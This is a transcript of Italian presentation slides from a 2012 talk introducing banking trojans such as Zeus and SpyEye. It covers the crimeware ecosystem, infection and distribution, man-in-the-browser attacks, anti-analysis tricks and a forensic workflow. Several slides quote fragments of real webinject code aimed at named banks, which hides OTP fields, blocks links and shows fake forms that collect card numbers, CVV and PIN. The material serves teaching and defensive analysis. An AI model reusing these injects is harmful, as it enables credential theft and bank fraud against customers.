malware bancario i ntroduzione a l c rimeware nel s ettore b ancario presi nella rete - c ollegio...
TRANSCRIPT
Malware Bancario
INTRODUZIONE AL CRIMEWARE NEL SETTORE BANCARIO
PRESI NELLA RETE - COLLEGIO GHISLIERI23 NOVEMBRE 2012
Dott. Francesco Schifilliti
COS’È UN BANKING TROJAN?
001
This term refers to the subset of malware
seeking to steal/theft data from electronic bank
accounts.
Within this context, other financial services
such as, for instance, online stock exchange
operations are also considered electronic
banking.
Zeus, SpyEye… e tanti altri
002
Zeus
SpyEye
AresTatanga
OddjobCarberp
Zeus
GameOve
r
GatakaShylock
CitadelCrid
exTorpig
Soggetti (minimi) Coinvolti
003
CyberCrimeOrganizatio
n
Developers
BlackMarket
MoneyMule/Pack Mule
Malware Developing
004
CyberCrimeOrganizatio
n
BlackMarket(Freelance
developers)
Developers(Affiliates)
Malware Distribution
005
MalwareAuthors
User?
Malware Distribution
006
MalwareAuthors
Pay-per-Install
Drive-by-Download
Exploit-as-a-Services
Ciclo Pay-per-Install
007
MalwareAuthors
Kingpin
Exploit-as-a-Services
Fase di Infezione e Controllo
008
Exploit Pack
Compromised Web Site
Infection
Infection Trojan Repository
Mail di Spam
Iterando il processo d’Infezione…
009
Flat Botnet P2P Botnet
Ciclo d’Infezione di un Malware sul PC
010
Infezione sul Disco
(ad es. SpyEye copia il file C:\cleansweep.exe)
Rendere ‘Persistent
’ il MW
(ad es. con lamodifica del
registry)
Injection
(generalmente sul
processo Explorer)
Estensione della
Injection
(generalmente con tecniche di
Hooking in Userland)
Connessione
persistente col Server
di C&C
Odore di $$$
011
C & C Server
User
data theft
data & session
theft
Man in the Browser
012
SO
Kernel-land
User-land
Anti-Detection/Deception Techniques MW Code
013
Anti Memory
Anti Emulation
Anti Debugging
Anti Disassembler
Cryptography
Packing & Protecting
Obfuscation
Struttura di SpyEye
014
P
Binary
Plugin del Malware:
• config.dat, ccgrabber
• collectors, sock5• customconnector• webinjectors.txt
PackerObfuscation
Anti-Dbg
C&C
Un pezzettino di Webinjector di uno SpyEye 10.7
015
…..
set_url *meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GPdata_before<bodydata_enddata_inject style="visibility:hidden”data_enddata_after id=data_enddata_before
</body>data_enddata_inject<script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script><script src='/error.html/trxm1/dbcommon.js'></script><script src='/error.html/trxm1/dbsepa.js'></script><script>if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';}</script>data_enddata_after</html>data_end
…..
Un pezzettino di Webinjector di un ATS
016
…..
set_url *commbank.com.au/netbank/UserMaintenance* GPdata_before<h1 class="PageTitle">*My Q*</h1>data_enddata_inject<script language="javascript" type="text/javascript”>window.onload = function() {
for ( i=0; i < document.links.length; i++ )if (document.links[i].id != 'H_LogOffLink' &&
document.links[i].id != 'ctl00_HeaderControl_LogOffLink’)document.links[i].onclick = function() { return
false; };};</script><script language="javascript" type="text/javascript”>
var clck_counter = 0;function msg(){
clck_counter++;if (clck_counter==2){
document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden”;
document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none
document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true;
document.getElementById('error').style.top = 42;
document.getElementById('error').style.left = 42;
document.getElementById('error').style.visibility = "visible”;
document.getElementById('error').style.display = "block”;
}return false;
}
…..
Webinject in Chiaro nella RAM
https://bcol.barclaycard.co.uk*cardSummary*∏‹∏:](È È È∏Í∏Í√ <style type="text/css">#inject { display: none; }.ui-dialog { width: 400px; font-size: 11px; }.ui-dialog .ui-dialog-titlebar-close { visibility: hidden; }.ui-dialog .ui-dialog-titlebar { visibility: hidden; display: none; }</style> Pfiıº| ÓΩ|HÓΩ|pÓΩ|òÓ≤ıº|¿ÓΩ|ËÓ∏˘º|Ô˙º|8Ô˙º|`ÔπàÔπ∞Ô∫ÿÔ∫–·∞Ô
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>
value=unescape(document.cookie.substring(offset, end)) jQuery("#inject_cc").focus();
} else if (jQuery("#inject_expdate_mm").val().length < 2) {
alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus();
} else if (jQuery("#inject_expdate_yy").val().length < 2) {
alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus();
} else if (jQuery("#inject_cvv").val().length < 3) {
alert('Please enter correct CVV'); jQuery("#inject_cvv").focus();
} else if (jQuery("#inject_pin").val().length < 5) {…….
017
SpyEye: esempio di MW modulare e parametrico
018
C & C Server
User
Cosa/Come Rubare è definito in base ai Plugin Installati sulla Bot.
billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9bugreport.dll_a6c1992119c1550db437aac86d4ffdadccgrabber.dll_5b1593855a6e8f01468878eb88be39dfcreditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2rdp.dll_0cb722049e024f2366ba9c187cb3929fddos.dll_716d82810241daa5e2a41327014e9a77…su Quale Banca/Ist. Finanziario
fare operazioni in Frode è definito in webinjectors.txt
CollectorCollector
Collector
a Chi Trasmettere i dati collezionatidal MW è definito in collectors.txt
Uno Schema di Riferimento dell’Analisi
019
Forensic Ananlysis
Disk Analysis
MW Searching
Reg. Analysis
Browser Analysis File Analysis
Hash Comparing
Entropy Analysis
MW Analysis
De- Anti-XYZ
Disassebling Debugging
Memory Dumping
Live Analysis
Network Analysis
Memory Analysis
PIENA COMPRENSIONE DEL FORENSIC ARTIFACT